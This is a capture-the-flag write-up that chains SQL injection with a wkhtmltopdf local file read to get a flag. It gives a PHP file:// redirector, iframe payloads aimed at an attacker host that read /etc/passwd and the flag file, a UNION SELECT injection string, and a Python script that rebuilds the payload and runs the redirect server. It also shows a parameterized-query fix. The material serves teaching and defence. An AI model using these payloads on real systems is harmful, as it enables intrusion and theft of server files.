Web Exploitation
book-print (100 pts)
Description
-
Solution
We are given a URL and the application source code. Let's check the source code.

We can see that the endpoints /book and /print are vulnerable to SQL injection. The /print endpoint also converts HTML to PDF with PDFKit, which invokes the local wkhtmltopdf binary. Let's check the version of wkhtmltopdf.

wkhtmltopdf 0.12.4 is vulnerable to local file read: it loads file:// URLs while rendering. From the Dockerfile we know that the flag is stored at /secret/flag_for_youuuu. So the idea is to chain the SQL injection with the local file read:
SQL injection to replace the value returned by the query
The returned value should be the wkhtmltopdf exploit that reads the local file
From app.rb we know that one of the values printed by /print is the second column of the query result (index 1), so the wkhtmltopdf payload goes into the second column of our UNION SELECT. An iframe pointing straight at file:// does not leak the flag, but a redirect does: the iframe points at an HTTP server we control, which answers with a Location header to a file:// URL that wkhtmltopdf then follows. server.php on the attacker host does the redirect:
<?php /* server.php: send wkhtmltopdf a 302 to the local file named in ?x= */ header('Location: file://' . $_REQUEST['x']); ?>
Exploit wkhtmltopdf. Test the redirect trick first with /etc/passwd; 192.168.1.11:8000 is the attacker host serving server.php and it must be reachable from the target container:
<iframe src=http://192.168.1.11:8000/server.php?x=/etc/passwd width=1000px height=1000px></iframe>
Put the wkhtmltopdf exploit into the SQL injection payload and send it to the server. The UNION must match the column count of the original query (six columns here), the iframe sits in the second column, and -- - comments out the rest of the query:
1 UNION SELECT 1,'<iframe src=http://192.168.1.11:8000/server.php?x=/secret/flag_for_youuuu width=1000px height=1000px></iframe>',3,4,5,6-- -
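To see the two halves of the chain run end to end without the challenge container, here is an added example (not the challenge's app.rb and not the author's exploit). It assumes a table named books with six columns, a query of the form SELECT * FROM books WHERE id = <input>, and a /print page that renders column index 1 of every returned row; none of these details are given on the page beyond the six-value UNION and the index-1 hint. The sample rows are constructed. The redirect server is a Python stand-in for server.php, and the attacker address and flag path are the ones from the write-up.

```python
"""Added example, not the challenge code: SQL injection placing an iframe in
column index 1, beside the parameterized fix, plus a Python version of the
server.php redirector (302 to file://<x>) that wkhtmltopdf follows.

Assumptions (not from the write-up): table `books` with six columns, query
"SELECT * FROM books WHERE id = <input>", /print renders column index 1.
"""
import sqlite3
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

ATTACKER = "192.168.1.11:8000"   # attacker host from the write-up; must be reachable from the target
FLAG_PATH = "/secret/flag_for_youuuu"


def iframe_payload(path, attacker=ATTACKER):
    """The wkhtmltopdf payload: an iframe pointing at the attacker's redirector."""
    return (f"<iframe src=http://{attacker}/server.php?x={path} "
            "width=1000px height=1000px></iframe>")


def sqli_payload(path, columns=6, html_column=1, attacker=ATTACKER):
    """Build "1 UNION SELECT 1,'<iframe ...>',3,4,5,6-- -" for a query with
    `columns` columns, placing the iframe in column `html_column`."""
    values = [str(i + 1) for i in range(columns)]
    values[html_column] = "'" + iframe_payload(path, attacker).replace("'", "''") + "'"
    return "1 UNION SELECT " + ",".join(values) + "-- -"


def make_db():
    """Constructed sample data standing in for the challenge database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books(id INTEGER, title TEXT, author TEXT, "
                 "year INTEGER, pages INTEGER, isbn TEXT)")
    conn.execute("INSERT INTO books VALUES (1,'Secure Coding','A. Author',2020,300,'x')")
    return conn


def vulnerable_query(conn, book_id):
    # String interpolation: this is the injection point (deliberately vulnerable).
    return conn.execute(f"SELECT * FROM books WHERE id = {book_id}").fetchall()


def safe_query(conn, book_id):
    # Bound parameter: the input is treated as a value, never as SQL.
    return conn.execute("SELECT * FROM books WHERE id = ?", (book_id,)).fetchall()


def render_print_page(rows):
    """Mock of /print: column index 1 of each row lands in the HTML that
    PDFKit would hand to wkhtmltopdf, so the iframe gets rendered."""
    return "<html><body>" + "".join(f"<h1>{row[1]}</h1>" for row in rows) + "</body></html>"


def redirect_location(query_string):
    """server.php logic: Location: file://<x>. Returns None when x is missing."""
    x = parse_qs(query_string).get("x")
    return f"file://{x[0]}" if x else None


class RedirectHandler(BaseHTTPRequestHandler):
    """HTTP stand-in for server.php: answer every GET with a 302 to file://<x>."""

    def do_GET(self):
        location = redirect_location(urlparse(self.path).query)
        if location is None:
            self.send_error(400, "missing x")
            return
        self.send_response(302)
        self.send_header("Location", location)
        self.end_headers()

    def log_message(self, *args):  # keep the listener quiet
        pass


def start_redirect_server(host="127.0.0.1", port=0):
    """Start the redirector in a daemon thread; returns (server, bound_port)."""
    server = HTTPServer((host, port), RedirectHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    conn = make_db()
    payload = sqli_payload(FLAG_PATH)
    print("payload:", payload)
    print("vulnerable /print HTML:", render_print_page(vulnerable_query(conn, payload)))
    print("parameterized query rows:", safe_query(conn, payload))
    server, port = start_redirect_server()
    print(f"redirector listening on 127.0.0.1:{port}; "
          f"GET /server.php?x=/etc/passwd -> 302 {redirect_location('x=/etc/passwd')}")
    server.shutdown()
```

Running the file shows the injected iframe appearing in the mocked /print HTML while the bound-parameter version returns no rows for the same input; the redirector is what the iframe's src would hit in a real run, and the 302 Location header is exactly what the PHP one-liner emits. wkhtmltopdf itself is not invoked here. On the application side the fix is the parameterized query shown above together with not letting wkhtmltopdf fetch local files at all (its --disable-local-file-access option, which newer releases make the default).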

Flag: CBC{hex_value}